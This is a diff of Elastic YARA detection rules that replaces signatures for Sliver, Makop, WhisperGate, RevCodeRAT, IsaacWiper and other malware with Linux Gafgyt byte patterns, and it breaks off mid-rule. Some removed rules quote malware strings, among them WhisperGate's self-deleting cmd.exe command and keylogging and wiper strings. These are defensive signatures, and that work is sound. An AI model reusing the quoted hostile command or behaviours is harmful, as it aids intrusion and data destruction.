"d9f852c28433128b0fd330bee35f7bd4aada5226e9ca865fe5cd8cca52b2a622" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "multi" + os = "linux" strings: - $a1 = ").RequestResend" - $a2 = ").GetPrivInfo" - $a3 = ").GetReconnectIntervalSeconds" - $a4 = ").GetPivotID" - $a5 = "name=PrivInfo" - $a6 = "name=ReconnectIntervalSeconds" - $a7 = "name=PivotID" + $a = { 8B 45 EC F7 D0 21 D0 33 45 FC C9 C3 55 48 89 E5 48 83 EC 30 48 89 } condition: - 2 of them + all of them } -rule ELASTIC_Multi_Trojan_Sliver_3Bde542D : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_862C4E0E : FILE MEMORY { meta: - description = "Detects Multi Trojan Sliver (Multi.Trojan.Sliver)" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "3bde542d-df52-4f05-84ff-de67e90592a9" - date = "2022-08-31" - modified = "2022-09-29" + id = "862c4e0e-83a4-458b-8c00-f2f3cf0bf9db" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Multi_Trojan_Sliver.yar#L27-L50" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "05461e1c2a2e581a7c30e14d04bd3d09670e281f9f7c60f4169e9614d22ce1b3" - logic_hash = "23a0e28c1423f577a147efdf927f2dc71871760e38d4d7494ead2920b90ef05e" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L1030-L1048" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "9526277255a8d632355bfe54d53154c9c54a4ab75e3ba24333c73ad0ed7cadb1" + logic_hash = "a1dce44e76f9d2a517c4849c58dfecb07e1ef0d78fddff10af601184d636583f" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "e52e39644274e3077769da4d04488963c85a0b691dc9973ad12d51eb34ba388b" + fingerprint = "2a6b4f8d8fb4703ed26bdcfbbb5c539dc451c8b90649bee80015c164eae4c281" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "multi" + os = "linux" strings: - $a1 = "B/Z-github.com/bishopfox/sliver/protobuf/sliverpbb" ascii fullword - $b1 = "InvokeSpawnDllReq" ascii fullword - $b2 = "NetstatReq" ascii fullword - $b3 = "HTTPSessionInit" ascii fullword - $b4 = "ScreenshotReq" ascii fullword - $b5 = "RegistryReadReq" ascii fullword + $a = { 02 89 45 F8 8B 45 F8 C1 E8 10 85 C0 75 E6 8B 45 F8 F7 D0 0F } condition: - 1 of ($a*) or all of ($b*) + all of them } -rule ELASTIC_Multi_Trojan_Sliver_3D6B7Cd3 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_9127F7Be : FILE MEMORY { meta: - description = "Detects Multi Trojan Sliver (Multi.Trojan.Sliver)" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "3d6b7cd3-f702-470c-819c-8750ec040083" - date = "2022-12-01" - modified = "2023-09-20" + id = "9127f7be-6e82-46a1-9f11-0b3570b0cd76" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Multi_Trojan_Sliver.yar#L52-L88" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "9846124cfd124eed466465d187eeacb4d405c558dd84ba8e575d8a7b3290403e" - logic_hash = "3cbd3358b7d59d6a2912069f4cb8de005b6fafd61e44111d1f6cf0418eb2d1fc" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L1050-L1068" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "899c072730590003b98278bdda21c15ecaa2f49ad51e417ed59e88caf054a72d" + logic_hash = "2b1fa115598561e081dfb9b5f24f6728b0d52cb81ac7933728d81646f461bcae" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "46d5388bd1fe767a4852c9e35420985d5011368dac6545fd57fbb256de9a94e9" + fingerprint = "72c742cb8b11ddf030e10f67e13c0392748dcd970394ec77ace3d2baa705a375" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "multi" + os = "linux" strings: - $session_start_x86_1 = { 89 4C 24 ?? 89 44 24 ?? 8D 4C 24 ?? 89 4C 24 ?? C6 44 24 ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? } - $session_start_x86_2 = { FF 05 ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 89 04 24 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 85 C9 74 ?? B8 ?? ?? ?? ?? } - $session_start_x86_3 = { E8 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 74 ?? FF 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 04 24 39 05 ?? ?? ?? ?? 7E ?? C6 44 24 ?? ?? 8B 54 24 ?? 8B 02 FF D0 83 C4 ?? } - $session_start_x64_1 = { 44 0F 11 7C 24 ?? 48 8D 0D ?? ?? ?? ?? 48 89 4C 24 ?? 48 89 44 24 ?? 48 8D 4C 24 ?? 48 89 4C 24 ?? C6 44 24 ?? ?? 0F 1F 00 E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? } - $session_start_x64_2 = { E8 ?? ?? ?? ?? 48 85 C0 74 ?? 48 FF 05 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 DB B9 ?? ?? ?? ?? 48 0F 45 C1 48 39 05 ?? ?? ?? ?? 7E ?? C6 44 24 ?? ?? 48 8B 54 24 ?? 48 8B 02 FF D0 } - $session_start_x64_3 = { 48 89 6C 24 ?? 48 8D 6C 24 ?? 49 C7 C5 ?? ?? ?? ?? 4C 89 6C 24 ?? C6 44 24 ?? ?? 48 8D 05 ?? ?? ?? ?? 31 DB E8 ?? ?? ?? ?? 44 0F 11 7C 24 ?? 48 8D 0D ?? ?? ?? ?? 48 89 4C 24 ?? 48 89 44 24 ?? 48 8D 4C 24 ?? 48 89 4C 24 ?? C6 44 24 ?? ?? 0F 1F 00 } - $register_x64_1 = { 48 81 EC ?? ?? ?? ?? 48 89 AC 24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 90 E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 5C 24 ?? 48 89 4C 24 ?? 0F 1F 44 00 ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 85 C9 48 8B 4C 24 ?? BA ?? ?? ?? ?? 48 0F 45 CA 48 89 4C 24 ?? 48 8B 54 24 ?? BE ?? ?? ?? ?? 48 0F 45 D6 48 89 54 24 ?? } - $register_x64_2 = { 48 8D 1D ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? } - $register_x64_3 = { E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 5C 24 ?? 48 89 4C 24 ?? 66 90 E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 85 C9 48 8B 8C 24 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 0F 45 CA 48 8B 54 24 ?? BE ?? ?? ?? ?? 48 0F 45 D6 48 85 DB 74 ?? 48 8D BC 24 ?? ?? ?? ?? 48 8D 7F ?? 0F 1F 00 48 89 6C 24 ?? 48 8D 6C 24 ?? } - $register_x64_4 = { 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 85 C9 48 8B 8C 24 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 0F 45 CA 48 89 8C 24 ?? ?? ?? ?? 48 8B B4 24 ?? ?? ?? ?? BF ?? ?? ?? ?? 48 0F 45 F7 48 89 B4 24 ?? ?? ?? ?? } - $register_x64_5 = { 48 89 84 24 ?? ?? ?? ?? 48 89 5C 24 ?? 48 89 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 85 C9 48 8B 8C 24 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 0F 45 CA 48 89 8C 24 ?? ?? ?? ?? 48 8B 54 24 ?? BE ?? ?? ?? ?? 48 0F 45 D6 48 89 54 24 ?? } - $register_x64_6 = { E8 ?? ?? ?? ?? 48 8B 6D ?? 48 8B 94 24 ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ?? 48 8B 54 24 ?? 48 89 94 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? } - $register_x64_7 = { E8 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 48 8B 4C 24 ?? 48 89 48 ?? 48 8B 4C 24 ?? 48 89 48 ?? 83 3D ?? ?? ?? ?? ?? 75 ?? } - $register_x64_8 = { 48 8D 7F ?? 0F 1F 00 48 89 6C 24 ?? 48 8D 6C 24 ?? E8 ?? ?? ?? ?? 48 8B 6D ?? 4C 8D 15 ?? ?? ?? ?? 4C 89 94 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 4C 89 94 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 4C 89 94 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? } - $register_x86_1 = { E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 0C 24 8B 54 24 ?? 85 C0 74 ?? 31 C9 31 D2 89 54 24 ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 04 24 8B 4C 24 ?? 85 C9 74 ?? 8D 7C 24 ?? } - $register_x86_2 = { 8D 0D ?? ?? ?? ?? 89 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? } - $register_x86_3 = { C7 40 ?? ?? ?? ?? ?? 8D 0D ?? ?? ?? ?? 89 48 ?? 8B 4C 24 ?? 89 48 ?? 8B 4C 24 ?? 89 48 ?? 8B 0D ?? ?? ?? ?? 85 C9 75 ?? } - $register_x86_4 = { E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 0C 24 8B 54 24 ?? 85 C0 74 ?? 31 C9 31 D2 89 54 24 ?? 89 ?? 24 } - $register_x86_5 = { 8B 04 24 89 84 24 ?? ?? ?? ?? 8B 4C 24 ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 04 24 8B 4C 24 ?? 8B 54 24 ?? 85 D2 74 ?? 31 C0 31 C9 89 4C 24 ?? 89 84 24 ?? ?? ?? ?? 8D 15 ?? ?? ?? ?? 89 14 24 E8 ?? ?? ?? ?? } + $a = { E4 F7 E1 89 D0 C1 E8 03 89 45 E8 8B 45 E8 01 C0 03 45 E8 C1 } condition: - 1 of ($session_start_*) and 1 of ($register_*) + all of them } -rule ELASTIC_Windows_Ransomware_Makop_3Ac2C13C : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_0E03B7D3 : FILE MEMORY { meta: - description = "Detects Windows Ransomware Makop (Windows.Ransomware.Makop)" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "3ac2c13c-45f0-4108-81fb-e57c3cc0e622" - date = "2021-08-05" - modified = "2021-10-04" + id = "0e03b7d3-a6b0-46a0-920e-c15ee7e723f7" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Makop.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "854226fc4f5388d40cd9e7312797dd63739444d69a67e4126ef60817fa6972ad" - logic_hash = "3fa7c506010a87ac97f415db32c21af091dff26fd912a8f9f5bb5e8d43a8da9e" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L1070-L1087" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "845be03fac893f8e914aabda5206000dc07947ade0b8f46cc5d58d8458f035f6" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "4658a5b34ecb2a7432b7ab48041cc064d917b88a4673f21aa6c3c44b115c9b8c" + fingerprint = "1bf1f271005328669b3eb4940e2b75eff9fc47208d79a12196fd7ce04bc4dbe8" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 20 00 75 15 8B 44 24 10 8B 4C 24 08 8B 54 24 0C 89 46 20 89 } + $a = { F5 74 84 32 63 29 5A B2 78 FF F7 FA 0E 51 B3 2F CD 7F 10 FA } condition: all of them } -rule ELASTIC_Windows_Ransomware_Makop_3E388338 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_32Eb0C81 : FILE MEMORY { meta: - description = "Detects Windows Ransomware Makop (Windows.Ransomware.Makop)" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "3e388338-83c7-453c-b865-13f3bd059515" - date = "2021-08-05" - modified = "2021-10-04" + id = "32eb0c81-25af-4670-ab77-07ea7ce1874a" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Makop.yar#L21-L44" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "854226fc4f5388d40cd9e7312797dd63739444d69a67e4126ef60817fa6972ad" - logic_hash = "5a6e5fd725f3d042c0c95b42ad00c93965a49aa6bda6ec5383a239f18d74742e" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L1089-L1107" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df" + logic_hash = "a06d9e1190ba79b0e19cab7468f01a49359629a6feb27b7d72f3d1d52d1483d7" score = 75 - quality = 50 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "7920469120a69fed191c5068739ed922dcf67aa26d68e44708a1d63dc0931bc3" + fingerprint = "7c50ed29e2dd75a6a85afc43f8452794cb787ecd2061f4bf415d7038c14c523f" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "MPR.dll" ascii fullword - $a2 = "\"%s\" n%u" wide fullword - $a3 = "\\\\.\\%c:" wide fullword - $a4 = "%s\\%s\\%s" wide fullword - $a5 = "%s\\%s" wide fullword - $a6 = "Start folder" wide fullword + $a = { D4 48 FF 45 F0 48 8B 45 F0 0F B6 00 84 C0 75 DB EB 12 48 8B } condition: all of them } -rule ELASTIC_Windows_Ransomware_Whispergate_C80F3B4B : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_9Abf7E0C : FILE MEMORY { meta: - description = "Detects Windows Ransomware Whispergate (Windows.Ransomware.WhisperGate)" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "c80f3b4b-f91b-4b8d-908e-f64c2c5d4b30" - date = "2022-01-17" - modified = "2022-01-17" + id = "9abf7e0c-5076-4881-a488-f0f62810f843" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_WhisperGate.yar#L1-L20" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92" - logic_hash = "04452141a867d4f6fce618c21795cc142a1265b56c62ecb9e579003d36b4b2b9" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L1109-L1126" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "00276330e388d07368577c4134343cb9fc11957dba6cff5523331199f1ed04aa" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "e8ad6a7cfabf96387deee56f38b0f0ba6d8fe85e7be9f153ccf72d69ee5db1c9" + fingerprint = "7d02513aaef250091a58db58435a1381974e55c2ed695c194b6b7b83c235f848" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $buffer = { E8 ?? ?? ?? ?? BE 20 40 40 00 29 C4 8D BD E8 DF FF FF E8 ?? ?? ?? ?? B9 00 08 00 00 F3 A5 } - $note = { 59 6F 75 72 20 68 61 72 64 20 64 72 69 76 65 20 68 61 73 20 62 65 65 6E 20 63 6F 72 72 75 70 74 65 64 2E 0D 0A } + $a = { 55 E0 0F B6 42 0D 83 C8 01 88 42 0D 48 8B 55 E0 0F B6 42 0D 83 } condition: all of them } -rule ELASTIC_Windows_Ransomware_Whispergate_3476008E : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_33801844 : FILE MEMORY { meta: - description = "Detects Windows Ransomware Whispergate (Windows.Ransomware.WhisperGate)" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "3476008e-1c98-4606-b60b-7fef0e360711" - date = "2022-01-18" - modified = "2022-01-18" + id = "33801844-50b1-4968-a1b7-d106f16519ee" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_WhisperGate.yar#L22-L43" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "9ef7dbd3da51332a78eff19146d21c82957821e464e8133e9594a07d716d892d" - logic_hash = "729818df1b6b82fc00eba0fe1c9139ec4746e1775146ab7fdea9e25dec1cddea" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L1128-L1146" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "2ceff60e88c30c02c1c7b12a224aba1895669aad7316a40b575579275b3edbb3" + logic_hash = "20b8ebce14776e48310be099afd0dca0f28778d0024318b339b75e2689f70128" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "0b8caff8cf9342bd50053712bf4c9aeab68532e340cc5e6cf400105afc150e39" + fingerprint = "36218345b9ce4aaf50b5df1642c00ac5caa744069e952eb6008a9a57a37dbbdc" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "cmd.exe /min /C ping 111.111.111.111 -n 5 -w 10 > Nul & Del /f /q \"%s\"" ascii fullword - $a2 = "%.*s.%x" wide fullword - $a3 = "A:\\Windows" wide fullword - $a4 = ".ONETOC2" wide fullword + $a = { 45 F8 48 83 E8 01 0F B6 00 3C 0D 75 0B 48 8B 45 F8 0F B6 00 } condition: all of them } -rule ELASTIC_Macos_Trojan_Fplayer_1C1Fae37 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_A33A8363 : FILE MEMORY { meta: - description = "Detects Macos Trojan Fplayer (MacOS.Trojan.Fplayer)" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "1c1fae37-8d19-4129-a715-b78163f93fd2" - date = "2021-10-05" - modified = "2021-10-25" + id = "a33a8363-5511-4fe1-a0d8-75156b9ccfc7" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_Fplayer.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f57e651088dee2236328d09705cef5e98461e97d1eb2150c372d00ca7c685725" - logic_hash = "0d65717bdbac694ffb2535a1ff584f7ec2aa7b553a08d29113c6e2bd7b2ff1aa" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L1148-L1165" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "3fe17dc43f07dacdad6ababf141983854b977e244c0af824fea0ab953ad70fee" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "abeb3cd51c0ff2e3173739c423778defb9a77bc49b30ea8442e6ec93a2d2d8d2" + fingerprint = "74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "linux" strings: - $a = { 56 41 55 41 54 53 48 83 EC 48 4D 89 C4 48 89 C8 48 89 D1 49 89 F6 49 89 FD 49 } + $a = { 41 88 02 48 85 D2 75 ED 5A 5B 5D 41 5C 41 5D 4C 89 F0 41 5E } condition: all of them } -rule ELASTIC_Windows_Trojan_Revcoderat_8E6D4182 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_9A62845F : FILE MEMORY { meta: - description = "Detects Windows Trojan Revcoderat (Windows.Trojan.Revcoderat)" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "8e6d4182-4ea8-4d4c-ad3a-d16b42e387f4" - date = "2021-09-02" - modified = "2022-01-13" + id = "9a62845f-6311-49ae-beac-f446b2909d9c" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Revcoderat.yar#L1-L22" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "77732e74850050bb6f935945e510d32a0499d820fa1197752df8bd01c66e8210" - logic_hash = "35626d752b291e343350534aece35f1d875068c2c050d12312a60e67753c71e1" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L1167-L1185" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f67f8566beab9d7494350923aceb0e76cd28173bdf2c4256e9d45eff7fc8cb41" + logic_hash = "b3ab125c8bfb5b7a0be0e92cf5a50057e403ab3597698ec2e7a8bafa0d3a8b80" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "bc259d888e913dffb4272e2f871592238eb78922989d30ac4dc23cdeb988cc78" + fingerprint = "2ccc813c5efed35308eb2422239b5b83d051eca64b7c785e66d602b13f8bd9b4" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "PLUGIN_PROCESS_REVERSE_PROXY: Plugin already exists, skipping download!" ascii fullword - $a2 = "TARGET_HOST_UPDATE(): Sync successful!" ascii fullword - $a3 = "WEBCAM_ACTIVATE: Plugin already exists, skipping download!" ascii fullword - $a4 = "send_keylog_get" ascii fullword + $a = { 10 83 F8 20 7F 1E 83 7D 08 07 75 33 8B 45 0C 83 C0 18 8B 00 83 } condition: all of them } -rule ELASTIC_Windows_Wiper_Isaacwiper_239Cd2Dc : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_4D81Ad42 : FILE MEMORY { meta: - description = "Detects Windows Wiper Isaacwiper (Windows.Wiper.IsaacWiper)" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "239cd2dc-6f93-43fa-98e8-ad7a0edb8a8a" - date = "2022-03-04" - modified = "2022-04-12" + id = "4d81ad42-bf08-48a9-9a93-85cb491257b3" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Wiper_IsaacWiper.yar#L1-L24" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "13037b749aa4b1eda538fda26d6ac41c8f7b1d02d83f47b0d187dd645154e033" - logic_hash = "102ffe215b1e1c39e1225cb39dfeb10a20a08c5b10f836490fc1501c6eb9e930" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L1187-L1205" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "3021a861e6f03df3e7e3919e6255bdae6e48163b9a8ba4f1a5c5dced3e3e368b" + logic_hash = "57b54eed37690949ba2d4eff713691f16f00207d7b374beb7dfa2e368588dbb0" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "a9c193d7c60b0c793c299b23f672d6428ceb229f2ceb2acbfc1124387954b244" + fingerprint = "f285683c3b145990e1b6d31d3c9d09177ebf76f183d0fa336e8df3dbcba24366" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "C:\\ProgramData\\log.txt" wide fullword - $a2 = "system physical drive -- FAILED" wide fullword - $a3 = "-- system logical drive: " wide fullword - $a4 = "start erasing system logical drive " wide fullword - $a5 = "-- logical drive: " wide fullword - $a6 = "-- start erasing logical drive " wide fullword + $a = { 0F 44 C8 07 0B BF F1 1B 7E 83 CD FF 31 DB 2E 22 } condition: - 5 of them + all of them } -rule ELASTIC_Windows_Trojan_Avemaria_31D2Bce9 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_6A510422 : FILE MEMORY { meta: - description = "Detects Windows Trojan Avemaria (Windows.Trojan.AveMaria)" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "31d2bce9-3266-447b-9a2d-57cf11a0ff1f" - date = "2021-05-30" - modified = "2021-08-23" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_AveMaria.yar#L1-L31" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b" - logic_hash = "7ba59c3be07e35b415719b60b14a0f629619e5729c20f50f00dbea0c2f8bd026" + id = "6a510422-3662-4fdb-9c03-0101f16e87cd" + date = "2021-06-28" + modified = "2021-09-16" + reference = 